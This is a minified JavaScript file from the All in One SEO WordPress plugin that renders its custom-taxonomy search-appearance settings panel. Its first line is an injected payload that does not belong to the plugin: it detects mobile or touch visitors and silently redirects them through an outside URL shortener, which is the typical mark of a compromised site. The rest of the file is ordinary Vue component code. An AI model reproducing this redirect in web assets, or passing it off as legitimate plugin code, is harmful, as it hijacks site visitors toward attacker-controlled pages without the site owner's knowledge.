(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{q as D,b as P,y as O}from"./app-core.c8323d51.js";import{u as B}from"./PostTypes.9ab2ae40.js";import{T as j,A as q}from"./TitleDescription.84ef03e4.js";import{C as L}from"./Card.9ee06a3e.js";import{C as R}from"./Tabs.ea329423.js";import{C as w}from"./Tooltip.569a23d9.js";import{S as E}from"./Trash.47f6fc0e.js";import{aq as u,f as i,i as m,O as b,ad as S,Q as h,R as l,a0 as _,a4 as I,S as N,j as o,P as U,ae as d,U as r}from"./vendor-vue-ui.232c7c36.js";import{_ as V}from"./_plugin-vue_export-helper.eefbdd86.js";import{_ as s,a as T}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./JsonValues.a0694556.js";import"./RadioToggle.11796642.js";import"./RobotsMeta.427ab190.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./Row.2ef96b1a.js";import"./SettingsRow.7bec777f.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./GoogleSearchPreview.bde29b0b.js";import"./Caret.aae02d8a.js";import"./Url.535116f6.js";import"./HtmlTagsEditor.381fbf72.js";import"./Editor.7ff35261.js";import"./vendor-quill.004fcde3.js";import"./Input.af9b9f81.js";import"./Pencil.683baab8.js";import"./UnfilteredHtml.9575a9a9.js";import"./vendor-emoji.92c96208.js";import"./Slide.f2114d9d.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Information.6ccba108.js";const n="all-in-one-seo-pack",z={setup(){const{getPostIconClass:a}=B();return{getPostIconClass:a,optionsStore:O(),rootStore:P(),settingsStore:D()}},components:{Advanced:q,CoreCard:L,CoreMainTabs:R,CoreTooltip:w,SvgCircleQuestionMark:E,TitleDescription:j},data(){return{internalDebounce:null,strings:{label:s("Label:",n),name:s("Slug:",n),postTypes:s("Post Types:",n),ctaButtonText:s("Unlock Custom Taxonomies",n),ctaDescription:T(s("%1$s %2$s lets you set the SEO title and description for custom taxonomies. You can also control all of the robots meta and other options just like the default category and tags taxonomies.",n),"AIOSEO","Pro"),ctaHeader:T(s("Custom Taxonomy Support is a %1$s Feature",n),"PRO")},tabs:[{slug:"title-description",name:s("Title & Description",n),access:"aioseo_search_appearance_settings",pro:!1},{slug:"advanced",name:s("Advanced",n),access:"aioseo_search_appearance_settings",pro:!1}]}},computed:{taxonomies(){return this.rootStore.aioseo.postData.taxonomies.filter(a=>this.rootStore.aioseo.data.isWooCommerceActive?!a.name.startsWith("pa_"):!0)}},methods:{processChangeTab(a,e){this.internalDebounce||(this.internalDebounce=!0,this.settingsStore.changeTab({slug:`${a}SA`,value:e}),setTimeout(()=>{this.internalDebounce=!1},50))}}},F={class:"aioseo-search-appearance-taxonomies"},M={class:"aioseo-description"};function Q(a,e,W,p,c,f){const C=u("svg-circle-question-mark"),v=u("core-tooltip"),A=u("core-main-tabs"),k=u("core-card");return i(),m("div",F,[(i(!0),m(b,null,S(f.taxonomies,(t,y)=>(i(),h(k,{key:y,slug:`${t.name}SA`},{header:l(()=>[o("div",{class:U(["icon dashicons",p.getPostIconClass(t.icon)])},null,2),d(" "+r(t.label)+" ",1),_(v,{"z-index":"99999"},{tooltip:l(()=>[o("div",M,[d(r(c.strings.label)+" ",1),o("strong",null,r(t.label),1),e[0]||(e[0]=o("br",null,null,-1)),d(" "+r(c.strings.name)+" ",1),o("strong",null,r(t.name),1),e[1]||(e[1]=o("br",null,null,-1)),d(" "+r(c.strings.postTypes),1),e[2]||(e[2]=o("br",null,null,-1)),o("ul",null,[(i(!0),m(b,null,S(t.postTypes,(g,x)=>(i(),m("li",{key:x},[o("strong",null,r(g),1)]))),128))])])]),default:l(()=>[_(C)]),_:2},1024)]),tabs:l(()=>[_(A,{tabs:c.tabs,showSaveButton:!1,active:p.settingsStore.settings.internalTabs[`${t.name}SA`],internal:"",onChanged:g=>f.processChangeTab(t.name,g)},null,8,["tabs","active","onChanged"])]),default:l(()=>[_(I,{name:"route-fade",mode:"out-in"},{default:l(()=>[(i(),h(N(p.settingsStore.settings.internalTabs[`${t.name}SA`]),{object:t,separator:p.optionsStore.options.searchAppearance.global.separator,options:p.optionsStore.dynamicOptions.searchAppearance.taxonomies[t.name],type:"taxonomies","show-bulk":!1},null,8,["object","separator","options"]))]),_:2},1024)]),_:2},1032,["slug"]))),128))])}const xt=V(z,[["render",Q]]);export{xt as default};
